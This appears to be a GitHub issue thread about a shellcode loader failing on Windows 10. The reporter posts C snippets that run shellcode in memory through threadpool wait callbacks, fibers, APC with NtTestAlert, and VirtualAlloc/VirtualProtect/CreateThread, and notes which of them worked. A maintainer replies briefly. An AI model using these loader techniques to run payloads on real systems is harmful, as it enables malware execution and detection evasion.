Open zhihuba opened 2 years ago
os:Win10
//The following is the test code //successful call !! ////CreateThreadpoolWait HANDLE event = CreateEvent(NULL, FALSE, TRUE, NULL); LPVOID shellcodeAddress = VirtualAlloc(NULL, shellSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); RtlMoveMemory(shellcodeAddress, buf, shellSize); PTP_WAIT threadPoolWait = CreateThreadpoolWait((PTP_WAIT_CALLBACK)shellcodeAddress, NULL, NULL); SetThreadpoolWait(threadPoolWait, event, NULL); WaitForSingleObject(event, INFINITE); return 0; ////fiber PVOID mainFiber = ConvertThreadToFiber(NULL); PVOID shellcodeLocation = VirtualAlloc(NULL, shellSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(shellcodeLocation, buf, shellSize); PVOID shellcodeFiber = CreateFiber(NULL, (LPFIBER_START_ROUTINE)shellcodeLocation, NULL); SwitchToFiber(shellcodeFiber); return 0; ////APC & NtTestAlert Code typedef VOID(NTAPI* pNtTestAlert)(VOID); pNtTestAlert NtTestAlert = (pNtTestAlert)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtTestAlert"); LPVOID lpBaseAddress = VirtualAlloc(NULL, shellSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); memcpy(lpBaseAddress, buf, shellSize); QueueUserAPC((PAPCFUNC)lpBaseAddress, GetCurrentThread(), NULL); NtTestAlert(); return 0; //call failed!! ////基础调用 DWORD oldprotect = 0; LPVOID base_addr = NULL; // 申请一块buf_len长度大小的空间,RW权限,不要开rwx,PAGE_EXECUTE_READWRITE base_addr = VirtualAlloc(0, shellSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); // 复制shellcode到新的空间,这个函数比较罕见,用memcpy也可以呀 RtlMoveMemory(base_addr, buf, shellSize); // 修改为执行RX权限 VirtualProtect(base_addr, shellSize, PAGE_EXECUTE_READ, &oldprotect); // 当前进程创建线程执行shellcode auto ct = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)base_addr, 0, 0, 0); // 等待线程返回值 WaitForSingleObject(ct, -1); // 释放内存 free(base_addr);
Is this issue still exists with the latest version? There are some major changes done on the loader which may fixed this issue.
os:Win10
Use multiple method tests to draw conclusions